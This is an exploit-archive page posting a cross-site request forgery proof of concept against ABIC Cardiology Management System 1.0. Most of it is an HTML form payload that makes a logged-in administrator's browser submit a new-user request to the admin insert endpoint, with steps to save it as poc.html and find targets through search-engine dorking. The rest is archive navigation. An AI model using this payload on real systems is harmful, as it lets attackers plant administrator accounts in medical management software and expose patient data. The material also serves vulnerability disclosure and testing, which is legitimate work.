ABIC Cardiology Management System 1.0 Cross Site Request Forgery

ABIC Cardiology Management System 1.0 Cross Site Request Forgery: Posted Aug 20, 2024; Authored by indoushka; ABIC Cardiology Management System version 1.0 suffers from a cross site request forgery vulnerability.; tags | exploit, csrf; SHA-256 | 732a8abb9600ae3051bdca23c8d93b67641762e3c7389fdee82bd67abfac06f5; Download | Favorite | View

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

=============================================================================================================================================
| # Title     : ABIC cardiology Management System 1.0 CSRF Vulnerability                                                                    |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            |
| # Vendor    : https://abicegypt.com/                                                                                                      |
=============================================================================================================================================

poc :

[+] Dorking İn Google Or Other Search Enggine.
  
[+] Line 7 : Set your target url

[+] save payload as poc.html 

[+] payload : 

<div class="panel panel-default panel-table">
                <div class="panel-heading"> <h2 class="text-center">New User </h2>
                </div>
                <div class="panel-body">
                  <div class="col-md-offset-2 col-md-8">

<form action="https://127.0.0.1.com/eg-admin/users/insert.php?" method="post" enctype="multipart/form-data" name="form1" id="form1">

            <div class="form-group"> User Name
                <input type="text" name="username" class="form-control" placeholder="Insert User Name">
            </div>
            <div class="form-group"> Password
                <input type="text" name="password" class="form-control" placeholder="Insert Password">
            </div>

      <div class="col-xs-12">
                <button type="submit" class="btn btn-primary btn-xl" name="add"> SAVE </button>
            </div>
  <input type="hidden" name="MM_insert" value="form1">
</form>

              </div>
                </div>
              </div>



Greetings to :============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |
==========================================================================

Top Authors In Last 30 Days

Red Hat 210 files
indoushka 182 files
Ubuntu 93 files
Gentoo 32 files
Debian 18 files
Matthias Deeg 11 files
Chris Beiter 11 files
Frederik Beimgraben 11 files
Apple 10 files
malvuln 8 files

File Archives

Systems

AIX (430)
Apple (2,115)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,135)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,599)
HPUX (881)
iOS (390)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,421)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,936)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,899)
UNIX (9,465)
UnixWare (188)
Windows (6,782)
Other

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

Share This

ABIC Cardiology Management System 1.0 Cross Site Request Forgery

File Archive:

October 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems